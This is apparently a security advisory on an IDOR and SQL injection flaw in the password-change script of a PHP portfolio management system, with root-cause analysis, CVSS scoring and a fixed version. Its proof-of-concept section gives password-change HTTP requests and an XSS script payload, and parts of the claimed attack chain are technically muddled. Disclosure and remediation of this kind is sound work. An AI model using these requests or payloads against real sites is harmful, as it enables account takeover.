CVE Report: 1000project IDOR Vulnerability - Password Modification

[9str0IL]

CVE Report: 1000project IDOR Vulnerability - Password Modification

Basic Information

Item	Content
Title	[High] 1000project IDOR Vulnerability - Unauthorized Password Modification
Product	1000project (Portfolio Management System MCA)
Vendor	1000 Projects
Affected Version	1.0
Severity	High (CVSS 3.1: 8.8)
Reporter	9str0il
Discovery Date	2026-04-10
Disclosure Date	2026-04-10
References	https://github.com/1000projects/portfolio-management-system
Software Link	https://1000projects.org/wp-content/uploads/2022/11/Portfolio-MP.7z

---

Vulnerability Description

A high severity IDOR (Insecure Direct Object Reference) vulnerability exists in 1000project update_passwd_process.php. The vulnerability allows an attacker to modify the password of any user account by manipulating the temp_user session variable, enabling unauthorized password changes without proper authorization checks.

Key Characteristics:

• Attack Vector: Session variable manipulation
• Impact: Unauthorized password modification for any user
• Authentication: Requires valid user session (but no additional authorization)

The vulnerability stems from the system using a session variable to identify the user whose password to change, without verifying that the current user has permission to modify that account.

---

Affected Component

Item	Content
File	update_passwd_process.php
Vulnerable Line	Line 18
Vulnerable Variable	$_SESSION['temp_user']
Attack Type	IDOR (Insecure Direct Object Reference)

---

Vulnerability Details

Vulnerable Code

File: update_passwd_process.php:10, 18

$uname = $_SESSION['temp_user'];

// Later in the code
$query = mysqli_query($con,"update reg_details set reg_passwd='$newpasswd' where reg_email='$uname'");

Root Cause

1. Session Variable Trust：The system blindly trusts the temp_user session variable without verification
2. Lack of Authorization：No check to ensure the current user has permission to modify the target account
3. Direct Object Reference：Directly uses the session value to identify the user object without access control
4. No Parameterization：Also contains SQL injection vulnerability due to direct string concatenation

Attack Vector

1. Attacker logs into their own account
2. Attacker manipulates the temp_user session variable to contain another user's email
3. Attacker submits a password change request
4. The system changes the password for the email stored in temp_user (not the current user)
5. Attacker gains access to the target user's account

---

CVSS 3.1 Vector String

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Metric	Value	Description
Attack Vector (AV)	Network	Can be exploited over the network
Attack Complexity (AC)	Low	No special conditions required
Privileges Required (PR)	Low	Requires valid user session
User Interaction (UI)	None	No user interaction required
Scope (S)	Unchanged	Does not affect other components
Confidentiality (C)	High	High impact on data confidentiality
Integrity (I)	High	High impact on data integrity
Availability (A)	None	No impact on availability

---

CWE Classification

Item	Content
CWE ID	CWE-639
CWE Name	Authorization Bypass Through User-Controlled Key
CAPEC ID	CAPEC-639

---

Impact

1. Account Takeover：Attackers can take control of any user account
2. Data Breach：Attackers can access sensitive information from compromised accounts
3. Privilege Escalation：Attackers can target admin accounts to gain elevated privileges
4. Identity Theft：Personal information may be compromised
5. Reputation Damage：Loss of user trust due to account compromises

Specific Attack Scenarios

Scenario 1: Admin Account Takeover

// Attacker manipulates session
$_SESSION['temp_user'] = "admin@example.com";
// Changes password for admin account

Scenario 2: Mass Password Changes

// Attacker could potentially change passwords for multiple users
// Through repeated session manipulation

Scenario 3: Data Exfiltration

// After taking over accounts, attacker can access
// Personal information, achievements, projects, etc.

---

Remediation

Recommended Fix

// update_passwd_process.php - FIXED VERSION

include("connection.php");
session_start();

if (isset($_POST['change'])) {
    $newpasswd = $_POST['newpasswd'];
    $cnpasswd = $_POST['cnpasswd'];

    // 1. Use the current session user, not temp_user
    $current_user = $_SESSION['user']; // This should be set during login

    if ($newpasswd != $cnpasswd) {
        $_SESSION['change-passwd'] = "Password does not match. Please Provide valid one.";
        header("location:changepasswd.php");
    }
    else
    {
        // 2. Use prepared statements to prevent SQL injection
        $stmt = $con->prepare("UPDATE reg_details SET reg_passwd = ? WHERE reg_email = ?");
        $stmt->bind_param("ss", $newpasswd, $current_user);
        $result = $stmt->execute();

        if($result){
            $_SESSION['pass-succ'] = "Password is changed successfully. You may login now.";
            header("location:changepasswd.php");
        }
        else{
            $_SESSION['pass-err'] = "Something is wrong. Please try again later.";
            header("location:changepasswd.php");
        }
    }
}

Additional Security Measures

1. Session Management

   • Use session variables that cannot be easily manipulated
   • Store user identity securely in session
   • Implement session validation

2. Access Control

   • Always verify user identity before allowing sensitive operations
   • Implement role-based access control
   • Log all password change attempts

3. Input Validation

   • Validate all user input
   • Use prepared statements for all database operations
   • Implement password strength requirements

4. Security Monitoring

   • Monitor for unusual password change patterns
   • Implement rate limiting for password change attempts
   • Alert on suspicious account activity

---

Proof of Concept (PoC)

Normal Password Change

# Normal password change request
POST /update_passwd_process.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=user_session

newpasswd=newpassword123&cnpasswd=newpassword123&change=Change

# Result: Current user's password changed

IDOR Attack - Change Admin Password

# Step 1: Attacker logs in as regular user
# Step 2: Attacker manipulates session (e.g., through XSS or session fixation)
# Step 3: Attacker submits password change request

POST /update_passwd_process.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=hacked_session

newpasswd=attackerpassword&cnpasswd=attackerpassword&change=Change

# Result: Admin's password changed to attacker's chosen password

Attack via XSS

<!-- XSS payload to manipulate session -->
<script>
// Inject via XSS vulnerability
document.cookie = "PHPSESSID=attacker_session";
// Manipulate temp_user session variable
fetch('/update_passwd_process.php', {
    method: 'POST',
    headers: {
        'Content-Type': 'application/x-www-form-urlencoded'
    },
    body: 'newpasswd=hacked&cnpasswd=hacked&change=Change'
});
</script>

---

Timeline

Date	Event
2026-04-10	Vulnerability discovered during code audit
2026-04-10	CVE report drafted
TBD	Vendor notification
TBD	Patch released
TBD	Public disclosure

---

References

1. https://github.com/1000projects/portfolio-management-system
2. https://cwe.mitre.org/data/definitions/639.html
3. https://owasp.org/www-community/attacks/Insecure_Direct_Object_References
4. https://capec.mitre.org/data/definitions/639.html
5. https://1000projects.org/wp-content/uploads/2022/11/Portfolio-MP.7z

---

Credits

Discovered by 9str0il during security code audit.

---

Disclaimer: This vulnerability report is submitted for responsible disclosure. The reporter is not responsible for any misuse of this information.